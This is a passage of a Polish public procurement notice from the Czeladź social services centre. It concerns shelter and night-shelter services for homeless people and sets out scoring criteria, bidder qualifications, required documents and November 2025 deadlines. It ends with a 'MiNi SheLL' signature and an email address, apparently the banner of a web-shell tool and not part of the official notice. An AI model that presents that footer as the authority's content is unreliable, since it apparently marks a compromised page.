schroniska/noc do siedziby CUS Czeladź w sposób:„Odległ od schroniska/nocleg do siedziby CUS w Czeladzi“ liczonej w linii prostej w promieniu do 30 km od siedziby CUS (wylicz dokonać używ strony internet: https://www.google.pl/maps).od 0 do15km-40 pkt, pow.15km do30 km-20pkt;pow 30km-0pkt.Zamaw dokona wyboru oferty tego z Wykon, którego oferta uzyska w wyniku oceny najwyż liczbę pkt. Przyznawanie pkt ofertom odbędzie się w oparciu o wzór: L=C+O gdzie: L-liczba pkt uzyskana przez ofertę,C liczba pkt uzyskanych w kryt &#34;Cena&#34;.O–liczba pkt uzyskanych w kryterium &#34;Odległość od schroniska do siedziby CUS w Czeladzi&#34;.W przypad gdy wykona nie wpisze w Form ofert (Załą 1a/b/c/d do SWZ) w punkcie 1.2.tj. w jakiej placówce i pod jakim adresem zrealizuje zamów oraz nie wpisze w jakim promieniu od siedziby CUS w Czeladzi znajduje się dana placówka, Zamaw przyjmuje, że placów znajd się powyż 30km od siedziby CUS i tym samym oferta dostanie 0pkt w kryterII tj.: odległ od schron do siedz CUS w Czeladzi(O).Ocenie będą podlegać wyłącz oferty nie podlegaj odrzuceniu.Za najkorzyst zostanie uznana oferta która otrzyma najwię ilość pkt łącznie ze wszystkich kryt.W syt, gdy Zamaw nie będzie mógł dokonać wyboru najkorzyst oferty ze wzgl na to, że zostały złożone oferty o takiej samej ilości pkt, wezwie on Wykona, którzy złożyli te oferty do złożenia w terminie określ przez Zamaw ofert dodat zawier nową cenę. Wykona składając oferty dodat, nie mogą zaofer cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.W toku badania oferty i oceny ofert Zam może żądać od Wykon wyjaś dot treści złoż przez nich ofert oraz lub innych skład dok lub oświad. Wykon są zobow do przedst wyjaś w terminie wskaz przez Zamaw. Zamaw wybiera najkorzyst ofertę w terminie związania ofertą określonym na Plat zakup z postępow.Jeżeli termin związ ofertą upłynie przed wyborem najkorzyst oferty, Zamaw wezwie Wykon, którego oferta otrzymała najwyższą ocenę do wyrażenia w wyznacz przez Zama w terminie pisemnej zgody na wybór jego oferty. W przyp braku zgody o której mowa w pkt7 oferta podlega odrzuceniu, a Zamaw zwraca się o wyrażenie takiej zgody do kolejnego Wykon, którego oferta została najwyż oceniona, chyba że, zachodzą przesł do unieważ postęp. Zamaw unieważnia postęp o udziel zam, jeżeli:-nie złożono żadnego wniosku o dopuszcz do udziału w postęp albo żadnej oferty; wszystkie złożone wnioski o dopuszcz do udziału w postęp albo oferty podlegały odrzuceniu;-cena lub koszt najkorzj oferty lub oferta z najniższą ceną przewyższa kwotę, którą zama zamierza przeznaczyć na sfinansowanie zamów, chyba że zam może zwiększyć tę kwotę do ceny lub kosztu najkorzyst oferty;-w przyp, o których mowa w art.248ust.3, art.249 i art.250ust.2, zostały złoż oferty dodat o takiej samej cenie lub koszcie;-wystąpiła istotna zmiana okolicz powod, że prowadz postęp lub wyk zamów nie leży w inter publ, czego nie można było wcześniej przewidzieć;-postęp obarczone jest niemoż do usunięcia wadą uniemożliw zawarcie niepodleg unieważ umowy w sprawie zam publ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość od schroniska do siedziby zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w rozdziale IX SWZ oraz spełniają określone przez zamawiającego warunki udziału w postępowaniu. 2. Na podstawie art. 112 ustawy pzp, o udzielnie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące: a) zdolności do występowania w obrocie gospodarczym: zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Dla części I, części II, części III, części IV wykonawca musi być wpisany do rejestru miejsc, w których gminy udzielają tymczasowego schronienia osobom bezdomnym prowadzonego przez Wojewodę c) sytuacji ekonomicznej lub finansowej: zamawiający nie stawia warunku w powyższym zakresie d) zdolności technicznej lub zawodowej: zamawiający wymaga aby wykonawca wykazał, że w ciągu 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje należycie zamówienie, którego przedmiotem było lub jest świadczenie usług schronienia dla osób bezdomnych. Wykonawca spełni warunek na poziomie minimalnym, jeżeli wykaże, że: dla części I - wykonał lub wykonuje co najmniej 1 usługę w zakresie udzielenia schronienia osobom bezdomnym dla co najmniej 10 mężczyzn bezdomnych dla części II - wykonał lub wykonuje co najmniej 1 usługę w zakresie udzielenia schronienia osobom bezdomnym dla co najmniej 1 kobiety bezdomnej dla części III - wykonał lub wykonuje co najmniej 1 usługę w zakresie udzielenia schronienia osobom bezdomnym dla co najmniej 1 osoby (kobiety lub mężczyzny) bezdomnej z usługami opiekuńczymi dla części IV - wykonał lub wykonuje co najmniej 1 usługę w zakresie udzielenia noclegu osobom bezdomnym w noclegowni dla co najmniej 1 osoby (kobiety lub mężczyzny) bezdomnej W przypadku składania oferty na wszystkie cztery części wykonawca winien wykazać minimum po jednej usłudze potwierdzającej odpowiednio spełnienie warunku odrębnie dla części I, części II, części III, części IV 3. Zamawiający, w stosunku do wykonawców wspólnie ubiegających się o udzielnie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej, dopuszcza łączne spełnienie warunku przez wykonawców. 4. Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych przez wykonawcę w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) dowód, że podmiot jest wpisany do Rejestru placówek udzielających tymczasowego schronienia prowadzonego przez Wojewodę; <br/>b) dla podmiotów działających na podstawie przepisów o stosunku Państwa do Kościoła Katolickiego oraz innych kościołów i związków wyznaniowych, obowiązkowym dokumentem jest kopia dekretu o mianowaniu księdza na proboszcza parafii, pełnomocnictwo lub upoważnienie zarządu głównego wydane dla osób go reprezentujących z oddziałów terenowych nieposiadających osobowości prawnej; <br/>c) w przypadku fundacji i stowarzyszeń – aktualny, zgodny ze stanem faktycznym wypis z Krajowego Rejestru Sądowego;<br/>d) odpis statutu;<br/>e) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usług zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn nienależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Okresy wyrażone w latach lub miesiącach, o których mowa powyżej, liczy się wstecz od dnia w którym upływa termin składania ofert. Wzór wykazu usług stanowi Załącznik nr 5 do SWZ; jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa powyżej dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy. <br/>UWAGA! <br/>1. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>a) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 pzp dane umożliwiające dostęp do tych środków; <br/>b) podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ustawy pzp. <br/>2. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>3. W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu warunków, o których mowa w Rozdziale X pkt I ppkt 2 składa przynajmniej jeden z wykonawców lub wszyscy wykonawcy złożą oświadczenia lub wspólne oświadczenie, że łącznie spełniają te warunki</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta składana jest pod rygorem nieważności w formie elektr.lub w postaci elektron. opatrzonej kwalifik. podpisem elektro., podpisem zaufanym lub podpisem osobistym. Ofertę należy sporządzić na formularzu, stan. Zał nr1 do nin. SWZ. 2. Ośw. o speł. warun. u. w postę. (w orygi) w zakresie wskazanym w Roz. VIII pkt 2., SWZ – Zał.nr2 do SWZ. Oświad. to stanowi dow. Potwierdz. spełnianie warunków udziału w postęp. na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w Roz. X pkt II do SWZ. Oświadczenie, o którym mowa powyżej, składa (wraz z ofertą) oddzielnie:- każdy z Wyk. wspólnie ubiegających się o zam. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wyk. oraz spełnianie warunków udziału w postęp. w zakresie, w jakim każdy z wykon. wykazuje spełnianie warunków udziału w postęp; - podmiot udostęp. zasoby, na którego potencjał powołuje się Wyk. celem potwier. spełniania warunków udziału w postęp. W takim przypadku oświad. potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postęp. w zakresie, w jakim podmiot udostępnia swoje zasoby Wyk. 3. Oświad. o niepodl. Wyklucz. (w orygin.) – na Zał.nr3 w zakresie wskazanym w Rozdziale X SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, w Rozdziale X pkt II do SWZ. Oświadczenie, o którym mowa powyżej wraz z ofertą składa oddzielnie: - każdy z Wykonawców wspólnie ubiegających się o zamówienie. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu; - podmiot udostępniający zasoby, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełniania warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy. 4. Upoważnienie (pełnomocnictwo) lub inny dokument, potwierdzający umocowanie do reprezentowania Wykonawcy (podpisania oferty), o ile nie wynika ono z dokumentów rejestrowych Wykonawcy. Powyższy zapis stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz do osoby działającej w imieniu podmiotu udostępniającego zasoby Wykonawcy. 5. Pełnomocnictwo (w orygin.) do reprezentowania Wykonawców ubiegających się wspólnie (konsorcja, spółki cywilne) o przedmiotowe zamówienie, określające zakres udzielonego pełnomocnictwa (pełnomocnik winien być powołany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie). 6. Zobowiąz. podmiotu udostęp. Zas. (w orygin.) (lub inny środek dowodowy) potwierdzający, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: zakres zasobów podmiotu udostępniającego zasoby przy wykonywaniu zamówienia, czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych, wykształcenia lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą – według wzoru stanowiącego zał. nr 4 do SWZ 7. Oświadczenie (w orygin.), z którego wynika, które usługi wykonają poszczególni wykonawcy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. Zamawiający dopuszcza złożenie tego oświadczenia na formularzu ofertowym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówieniowa publicznego. Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem. 2. Warunek dotyczy uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy pzp, zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. 3. W odniesieniu do warunków dotyczący wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonują usługi, do realizacji których te zdolności są wymagane. 4. W przypadku, o którym mowa w pkt 2 i 3, wykonawcy wspólnie ubiegających się o dzielnie zamówienia dołączają odpowiednio do oferty oświadczenie z którego wynika, które usługi wykonują poszczególni wykonawcy. Zamawiający dopuszcza złożenie tego oświadczenia na formularzu ofertowym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w oparciu o art. 454 i art. 455 pzp w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, zgodnie z warunkami zawartymi w Załączniku nr 7 i 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-21 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com